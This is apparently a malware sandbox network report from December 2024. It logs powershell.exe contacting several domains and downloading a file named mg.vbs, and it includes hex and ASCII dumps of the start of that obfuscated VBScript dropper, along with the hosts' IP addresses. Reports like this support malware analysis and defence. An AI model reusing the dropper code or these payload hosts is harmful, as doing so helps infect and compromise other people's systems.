                                                                            Dec 5, 2024 10:40:32.607942104 CET49900443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:32.608208895 CET49900443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:36.618702888 CET49912443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:36.618747950 CET44349912184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:36.618833065 CET49912443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:36.619052887 CET49912443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:36.619061947 CET44349912184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:37.877587080 CET44349912184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:37.879091024 CET49912443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:37.879105091 CET44349912184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:38.336647034 CET44349912184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:38.336713076 CET44349912184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:38.337193012 CET49912443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:38.337485075 CET49912443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:42.337739944 CET49924443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:42.337798119 CET44349924148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:42.337920904 CET49924443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:42.338118076 CET49924443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:42.338129997 CET44349924148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:43.744760990 CET44349924148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:43.745975971 CET49924443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:43.746000051 CET44349924148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:44.294302940 CET44349924148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:44.294475079 CET44349924148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:44.294540882 CET49924443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:44.294861078 CET49924443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:48.306463957 CET49935443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:48.306540966 CET44349935184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:48.306672096 CET49935443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:48.306868076 CET49935443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:48.306885958 CET44349935184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:49.577987909 CET44349935184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:49.579250097 CET49935443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:49.579292059 CET44349935184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:50.040007114 CET44349935184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:50.040086031 CET44349935184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:40:50.040131092 CET49935443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:50.040481091 CET49935443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:40:54.042030096 CET49947443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:54.042085886 CET44349947148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:54.042166948 CET49947443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:54.042402029 CET49947443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:54.042417049 CET44349947148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:55.440092087 CET44349947148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:55.441257000 CET49947443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:55.441272974 CET44349947148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:55.985881090 CET44349947148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:55.986058950 CET44349947148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:40:55.986196995 CET49947443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:40:55.986978054 CET49947443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:41:00.009308100 CET49963443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:41:00.009360075 CET44349963184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:41:00.009449959 CET49963443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:41:00.009670973 CET49963443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:41:00.009685993 CET44349963184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:41:01.273096085 CET44349963184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:41:01.274707079 CET49963443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:41:01.274744987 CET44349963184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:41:01.733983040 CET44349963184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:41:01.734050989 CET44349963184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:41:01.734128952 CET49963443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:41:01.734853983 CET49963443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:41:05.745781898 CET49976443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:41:05.745836973 CET44349976148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:41:05.745908976 CET49976443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:41:05.746215105 CET49976443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:41:05.746226072 CET44349976148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:41:07.144364119 CET44349976148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:41:07.145567894 CET49976443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:41:07.145613909 CET44349976148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:41:07.694411993 CET44349976148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:41:07.694591999 CET44349976148.251.114.233192.168.2.10
                                                                            Dec 5, 2024 10:41:07.694647074 CET49976443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:41:07.694991112 CET49976443192.168.2.10148.251.114.233
                                                                            Dec 5, 2024 10:41:11.697592974 CET49990443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:41:11.697642088 CET44349990184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:41:11.697796106 CET49990443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:41:11.698132038 CET49990443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:41:11.698146105 CET44349990184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:41:12.961129904 CET44349990184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:41:12.962521076 CET49990443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:41:12.962537050 CET44349990184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:41:13.421901941 CET44349990184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:41:13.421991110 CET44349990184.171.244.231192.168.2.10
                                                                            Dec 5, 2024 10:41:13.422075033 CET49990443192.168.2.10184.171.244.231
                                                                            Dec 5, 2024 10:41:13.422580004 CET49990443192.168.2.10184.171.244.231

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Dec 5, 2024 10:39:24.059613943 CET6073753192.168.2.101.1.1.1
                                                                            Dec 5, 2024 10:39:24.197885990 CET53607371.1.1.1192.168.2.10
                                                                            Dec 5, 2024 10:39:27.068306923 CET5978053192.168.2.101.1.1.1
                                                                            Dec 5, 2024 10:39:27.297792912 CET53597801.1.1.1192.168.2.10
                                                                            Dec 5, 2024 10:39:31.201029062 CET6080753192.168.2.101.1.1.1
                                                                            Dec 5, 2024 10:39:31.342989922 CET53608071.1.1.1192.168.2.10
                                                                            Dec 5, 2024 10:39:43.541732073 CET6451253192.168.2.101.1.1.1
                                                                            Dec 5, 2024 10:39:43.840265989 CET53645121.1.1.1192.168.2.10

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Dec 5, 2024 10:39:24.059613943 CET192.168.2.101.1.1.10x862bStandard query (0)www.fornid.comA (IP address)IN (0x0001)false
                                                                            Dec 5, 2024 10:39:27.068306923 CET192.168.2.101.1.1.10xcb3bStandard query (0)www.pineappletech.aeA (IP address)IN (0x0001)false
                                                                            Dec 5, 2024 10:39:31.201029062 CET192.168.2.101.1.1.10xd7c1Standard query (0)www.almrwad.comA (IP address)IN (0x0001)false
                                                                            Dec 5, 2024 10:39:43.541732073 CET192.168.2.101.1.1.10xcc06Standard query (0)www.erp-royal-crown.infoA (IP address)IN (0x0001)false

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Dec 5, 2024 10:39:24.197885990 CET1.1.1.1192.168.2.100x862bNo error (0)www.fornid.comfornid.comCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 5, 2024 10:39:24.197885990 CET1.1.1.1192.168.2.100x862bNo error (0)fornid.com93.95.216.175A (IP address)IN (0x0001)false
                                                                            Dec 5, 2024 10:39:27.297792912 CET1.1.1.1192.168.2.100xcb3bNo error (0)www.pineappletech.ae91.193.42.13A (IP address)IN (0x0001)false
                                                                            Dec 5, 2024 10:39:31.342989922 CET1.1.1.1192.168.2.100xd7c1No error (0)www.almrwad.comalmrwad.comCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 5, 2024 10:39:31.342989922 CET1.1.1.1192.168.2.100xd7c1No error (0)almrwad.com184.171.244.231A (IP address)IN (0x0001)false
                                                                            Dec 5, 2024 10:39:43.840265989 CET1.1.1.1192.168.2.100xcc06No error (0)www.erp-royal-crown.infoerp-royal-crown.infoCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 5, 2024 10:39:43.840265989 CET1.1.1.1192.168.2.100xcc06No error (0)erp-royal-crown.info148.251.114.233A (IP address)IN (0x0001)false

                                                                            HTTP Request Dependency Graph

                                                                            • www.fornid.com
                                                                            • www.pineappletech.ae
                                                                            • www.almrwad.com
                                                                            • www.erp-royal-crown.info

                                                                            HTTPS Proxied Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.104972893.95.216.1754438104C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:39:25 UTC116OUTGET /wh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1
                                                                            Host: www.fornid.com
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:39:26 UTC553INHTTP/1.1 404 Not Found
                                                                            Date: Thu, 05 Dec 2024 09:39:25 GMT
                                                                            Server: Apache
                                                                            P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
                                                                            Set-Cookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=rMDVJJyqzbUxb1uFCvyisiM0e%2FK268mtgB%2FbNpOhPhr4fxnTX%2FMSpEfZIoqrX%2BXqP6DO2Fqc%2BBFZkXxuDpMJZKAr8c7Z1ao6vEvWxyuOg1g%3D000074; expires=Wed, 25-Dec-2024 09:39:26 GMT; Max-Age=1728000; path=/; domain=www.fornid.com; httponly
                                                                            Upgrade: h2,h2c
                                                                            Connection: Upgrade, close
                                                                            Vary: Accept-Encoding
                                                                            Transfer-Encoding: chunked
                                                                            Content-Type: text/html; charset=utf-8
                                                                            2024-12-05 09:39:26 UTC7639INData Raw: 31 31 65 35 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6c 74 2d 69 65 39 20 6c 74 2d 69 65 38 20 6c 74 2d 69 65 37 20 22 20 6c 61 6e 67 3d 22 69 74 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6c 74 2d 69 65 39 20 6c 74 2d 69 65 38 20 69 65 37 22 20 6c 61 6e 67 3d 22 69 74 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6c 74 2d 69 65 39 20 69 65 38 22 20 6c 61 6e 67 3d 22 69 74 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69
                                                                            Data Ascii: 11e50<!DOCTYPE HTML>...[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7 " lang="it"><![endif]-->...[if IE 7]><html class="no-js lt-ie9 lt-ie8 ie7" lang="it"><![endif]-->...[if IE 8]><html class="no-js lt-ie9 ie8" lang="it"><![endif]-->...[i
                                                                            2024-12-05 09:39:26 UTC136INData Raw: 61 67 61 6d 65 6e 74 69 22 20 74 69 74 6c 65 3d 22 43 6f 6d 65 20 61 63 71 75 69 73 74 61 72 65 22 20 20 6f 6e 63 6c 69 63 6b 3d 22 77 69 6e 64 6f 77 2e 6f 70 65 6e 28 74 68 69 73 2e 68 72 65 66 29 3b 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e 43 6f 6d 65 20 61 63 71 75 69 73 74 61 72 65 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 09 09 0a 09 0a 09 3c 2f 75 6c 3e 0a 0a 3c 2f 64 69 76 3e 0a 0a 3c 21 2d 2d 20 2f 42
                                                                            Data Ascii: agamenti" title="Come acquistare" onclick="window.open(this.href);return false;">Come acquistare</a></li></ul></div>... /B
                                                                            2024-12-05 09:39:26 UTC8192INData Raw: 6c 6f 63 6b 20 6c 69 6e 6b 73 20 6d 6f 64 75 6c 65 20 2d 2d 3e 0a 0a 09 3c 21 2d 2d 20 4d 65 6e 75 20 2d 2d 3e 0d 0a 09 3c 64 69 76 20 69 64 3d 22 74 6d 5f 74 6f 70 6d 65 6e 75 22 3e 0d 0a 09 09 3c 68 34 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 5f 62 6c 6f 63 6b 22 3e 4d 65 6e 75 3c 2f 68 34 3e 0d 0a 09 09 09 3c 75 6c 20 63 6c 61 73 73 3d 22 74 72 65 65 20 64 68 74 6d 6c 22 3e 0d 0a 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 34 2d 75 74 65 6e 73 69 6c 69 2d 70 65 72 2d 6c 2d 69 6e 64 75 73 74 72 69 61 2d 65 2d 6c 2d 65 64 69 6c 69 7a 69 61 22 20 74 69 74 6c 65 3d 22 55 74 65 6e 73 69 6c 69 20 70 65 72 20 6c 27 69 6e 64 75 73 74 72 69 61 20 65 20 6c 27 65
                                                                            Data Ascii: lock links module -->... Menu --><div id="tm_topmenu"><h4 class="title_block">Menu</h4><ul class="tree dhtml"><li class=""><a href="https://www.fornid.com/4-utensili-per-l-industria-e-l-edilizia" title="Utensili per l'industria e l'e
                                                                            2024-12-05 09:39:26 UTC8192INData Raw: 62 72 69 66 69 63 61 6e 74 65 22 20 74 69 74 6c 65 3d 22 4f 6c 69 6f 20 6c 75 62 72 69 66 69 63 61 6e 74 65 22 3e 4f 6c 69 6f 20 6c 75 62 72 69 66 69 63 61 6e 74 65 3c 2f 61 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 74 6d 5f 73 75 62 55 4c 22 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 32 32 2d 6f 6c 69 6f 2d 69 64 72 61 75 6c 69 63 6f 22 20 74 69 74 6c 65 3d 22 4f 6c 69 6f 20 69 64 72 61 75 6c 69 63 6f 20 49 53 4f 20 33 32 2c 20 34 36 20 65 20 36 38 22 3e 4f 6c 69 6f 20 69 64 72 61 75 6c 69 63 6f 20 49 53 4f 20 33 32 2c 20 34 36 20 65 20 36 38 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77
                                                                            Data Ascii: brificante" title="Olio lubrificante">Olio lubrificante</a><ul class="tm_subUL"><li class=""><a href="https://www.fornid.com/22-olio-idraulico" title="Olio idraulico ISO 32, 46 e 68">Olio idraulico ISO 32, 46 e 68</a></li><li class=""><a href="https://www
                                                                            2024-12-05 09:39:26 UTC8192INData Raw: 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 33 30 35 2d 72 61 63 63 6f 72 64 65 72 69 61 2d 69 6e 2d 6f 74 74 6f 6e 65 2d 75 73 6f 2d 63 69 76 69 6c 65 2d 69 6e 64 75 73 74 72 69 61 6c 65 2d 65 2d 70 65 72 2d 70 6f 6d 70 65 2d 69 64 72 61 75 6c 69 63 68 65 22 20 74 69 74 6c 65 3d 22 52 61 63 63 6f 72 64 65 72 69 61 20 69 6e 20 6f 74 74 6f 6e 65 20 75 73 6f 20 63 69 76 69 6c 65 2c 20 69 6e 64 75 73 74 72 69 61 6c 65 20 65 20 70 65 72 20 70 6f 6d 70 65 20 69 64 72 61 75 6c 69 63 68 65 22 3e 52 61 63 63 6f 72 64 65 72 69 61 20 69 6e 20 6f 74 74 6f 6e 65 20 75 73 6f 20 63 69 76 69 6c 65 2c 20 69 6e 64 75 73 74 72 69 61 6c 65 20 65 20 70 65 72 20 70 6f 6d 70 65 20 69
                                                                            Data Ascii: ><li class=""><a href="https://www.fornid.com/305-raccorderia-in-ottone-uso-civile-industriale-e-per-pompe-idrauliche" title="Raccorderia in ottone uso civile, industriale e per pompe idrauliche">Raccorderia in ottone uso civile, industriale e per pompe i
                                                                            2024-12-05 09:39:26 UTC8192INData Raw: 6d 2f 32 35 32 2d 70 6f 6d 70 65 2d 70 65 72 2d 74 72 61 74 74 6f 72 69 22 20 74 69 74 6c 65 3d 22 50 6f 6d 70 65 20 70 65 72 20 74 72 61 74 74 6f 72 69 22 3e 50 6f 6d 70 65 20 70 65 72 20 74 72 61 74 74 6f 72 69 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 32 35 33 2d 70 6f 6d 70 65 2d 70 65 72 2d 66 6f 67 6e 61 74 75 72 61 22 20 74 69 74 6c 65 3d 22 50 6f 6d 70 65 20 70 65 72 20 66 6f 67 6e 61 74 75 72 61 22 3e 50 6f 6d 70 65 20 70 65 72 20 66 6f 67 6e 61 74 75 72 61 3c 2f 61 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 74 6d 5f 73 75 62 55 4c 22 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77
                                                                            Data Ascii: m/252-pompe-per-trattori" title="Pompe per trattori">Pompe per trattori</a></li><li class=""><a href="https://www.fornid.com/253-pompe-per-fognatura" title="Pompe per fognatura">Pompe per fognatura</a><ul class="tm_subUL"><li class=""><a href="https://www
                                                                            2024-12-05 09:39:26 UTC8192INData Raw: 61 72 72 65 6c 6c 69 20 70 65 72 20 69 72 72 6f 72 61 7a 69 6f 6e 65 20 63 6f 6e 20 6d 6f 74 6f 70 6f 6d 70 65 22 3e 43 61 72 72 65 6c 6c 69 20 70 65 72 20 69 72 72 6f 72 61 7a 69 6f 6e 65 20 63 6f 6e 20 6d 6f 74 6f 70 6f 6d 70 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 32 32 35 2d 6d 6f 74 6f 70 6f 6d 70 65 2d 69 72 72 6f 72 61 74 72 69 63 69 22 20 74 69 74 6c 65 3d 22 4d 6f 74 6f 70 6f 6d 70 65 20 69 72 72 6f 72 61 74 72 69 63 69 22 3e 4d 6f 74 6f 70 6f 6d 70 65 20 69 72 72 6f 72 61 74 72 69 63 69 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73
                                                                            Data Ascii: arrelli per irrorazione con motopompe">Carrelli per irrorazione con motopompe</a></li><li class=""><a href="https://www.fornid.com/225-motopompe-irroratrici" title="Motopompe irroratrici">Motopompe irroratrici</a></li></ul></li><li class=""><a href="https
                                                                            2024-12-05 09:39:26 UTC8192INData Raw: 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 09 3c 64 69 76 3e 0a 0a 09 09 09 09 09 09 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 64 61 72 6b 22 3e 54 6f 74 61 6c 65 3c 2f 73 74 72 6f 6e 67 3e 0a 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 69 64 3d 22 6c 61 79 65 72 5f 63 61 72 74 5f 70 72 6f 64 75 63 74 5f 70 72 69 63 65 22 3e 3c 2f 73 70 61 6e 3e 0a 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 61 79 65 72 5f 63 61 72 74 5f 63 61 72 74 20 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 6d 64 2d 36 22 3e 0a 0a 09 09 09 09 3c 70 3e 0a 0a 09 09 09 09 09 3c 21 2d 2d 20 50 6c 75 72 61 6c 20 43 61 73 65 20 5b 62 6f 74 68 20 63 61 73 65 73 20 61 72 65 20 6e
                                                                            Data Ascii: </div><div><strong class="dark">Totale</strong><span id="layer_cart_product_price"></span></div></div></div><div class="layer_cart_cart col-xs-12 col-md-6"><p>... Plural Case [both cases are n
                                                                            2024-12-05 09:39:26 UTC8192INData Raw: 73 70 61 6c 6c 65 74 2d 65 6c 65 74 74 72 6f 6e 69 63 69 2d 6c 69 66 74 65 72 2d 62 79 2d 70 72 61 6d 61 63 22 20 74 69 74 6c 65 3d 22 54 72 61 6e 73 70 61 6c 6c 65 74 20 65 6c 65 74 74 72 6f 6e 69 63 69 20 20 4c 49 46 54 45 52 20 42 59 20 50 52 41 4d 41 43 22 3e 54 72 61 6e 73 70 61 6c 6c 65 74 20 65 6c 65 74 74 72 6f 6e 69 63 69 20 20 4c 49 46 54 45 52 20 42 59 20 50 52 41 4d 41 43 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 33 33 39 2d 64 69 73 74 72 69 62 75 7a 69 6f 6e 65 2d 67 72 61 73 73 6f 2d 6d 65 63 6c 75 62 65 22 20 74 69 74 6c 65 3d 22 44 49 53 54 52 49 42 55 5a 49 4f 4e 45 20 47 52 41 53 53 4f 20
                                                                            Data Ascii: spallet-elettronici-lifter-by-pramac" title="Transpallet elettronici LIFTER BY PRAMAC">Transpallet elettronici LIFTER BY PRAMAC</a></li></ul></li><li class=""><a href="https://www.fornid.com/339-distribuzione-grasso-meclube" title="DISTRIBUZIONE GRASSO
                                                                            2024-12-05 09:39:26 UTC416INData Raw: 46 46 50 31 20 2d 20 46 46 50 32 20 2d 20 46 46 50 33 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 39 30 2d 6d 61 73 63 68 65 72 65 2d 70 65 72 2d 73 61 6c 64 61 74 75 72 61 22 20 74 69 74 6c 65 3d 22 4d 61 73 63 68 65 72 65 20 70 65 72 20 73 61 6c 64 61 74 75 72 61 22 3e 4d 61 73 63 68 65 72 65 20 70 65 72 20 73 61 6c 64 61 74 75 72 61 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 33 31 34 2d 73 63 61 72 70 65 2d 61 6e 74 69 6e 66 6f 72 74 75 6e 69 73 74 69 63 68 65 2d 65 2d 73 74 69 76 61 6c 65 2d 64 61 2d 6c 61 76 6f 72 6f
                                                                            Data Ascii: FFP1 - FFP2 - FFP3</a></li><li class=""><a href="https://www.fornid.com/90-maschere-per-saldatura" title="Maschere per saldatura">Maschere per saldatura</a></li><li class=""><a href="https://www.fornid.com/314-scarpe-antinfortunistiche-e-stivale-da-lavoro


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.104974191.193.42.134438104C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:39:28 UTC79OUTGET /na/mg.vbs HTTP/1.1
                                                                            Host: www.pineappletech.ae
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:39:29 UTC232INHTTP/1.1 200 OK
                                                                            Connection: close
                                                                            content-type: text/vbscript
                                                                            last-modified: Thu, 27 Jun 2024 13:15:58 GMT
                                                                            accept-ranges: bytes
                                                                            content-length: 29287
                                                                            date: Thu, 05 Dec 2024 09:39:28 GMT
                                                                            server: LiteSpeed
                                                                            vary: User-Agent
                                                                            2024-12-05 09:39:29 UTC1136INData Raw: 0d 0a 0d 0a 0d 0a 46 75 6e 63 74 69 6f 6e 20 53 65 61 73 6f 6e 69 6e 67 28 41 6d 62 72 61 69 6e 29 0d 0a 0d 0a 0d 0a 50 75 62 6c 69 6b 75 6d 6d 65 74 62 61 74 66 6f 77 6c 20 3d 20 4d 69 64 28 4d 69 64 42 28 43 6f 6d 6d 61 6e 64 2c 20 34 34 2c 20 32 31 33 29 2c 32 31 2c 32 35 29 0d 0a 0d 0a 53 65 61 73 6f 6e 69 6e 67 20 3d 20 43 68 72 57 28 41 6d 62 72 61 69 6e 29 0d 0a 0d 0a 4f 70 73 6b 72 65 6b 6e 69 76 73 70 6c 69 64 20 3d 20 43 6f 6d 6d 61 6e 64 20 0d 0a 0d 0a 0d 0a 45 6e 64 20 46 75 6e 63 74 69 6f 6e 20 0d 0a 0d 0a 65 6c 65 6b 74 72 6f 69 6e 67 65 6e 69 72 65 72 6e 65 20 3d 20 4c 65 6e 42 28 22 53 61 72 64 69 6e 69 65 72 65 6e 22 29 20 0d 0a 65 6c 65 6b 74 72 6f 69 6e 67 65 6e 69 72 65 72 6e 65 20 3d 20 65 6c 65 6b 74 72 6f 69 6e 67 65 6e 69 72 65 72
                                                                            Data Ascii: Function Seasoning(Ambrain)Publikummetbatfowl = Mid(MidB(Command, 44, 213),21,25)Seasoning = ChrW(Ambrain)Opskreknivsplid = Command End Function elektroingenirerne = LenB("Sardinieren") elektroingenirerne = elektroingenirer
                                                                            2024-12-05 09:39:29 UTC14994INData Raw: 43 6f 6e 73 74 20 54 61 70 65 74 69 20 3d 20 22 44 65 6e 69 61 62 6c 65 20 64 61 74 61 73 74 79 72 20 75 6e 63 65 6c 69 62 61 74 65 22 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 4e 6f 61 6f 72 64 65 74 73 20 3d 20 2d 34 35 30 38 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 4f 73 74 65 6d 61 64 20 3d 20 26 48 37 35 30 32 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 42 6f 74 72 79 6f 6d 79 63 65 73 31 34 31 20 3d 20 26 48 46 46 46 46 45 38 38 38 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 55 66 6f 72 64 72 61 67 65 6c 69 67 73 74 65 20 3d 20 26 48 35 41 36 35 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 52 65 76 65 72 73 6f 20 3d 20 26 48 45 39 34 38 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 53 61 61 74 73 20 3d 20 22 44 65 63 69 6d
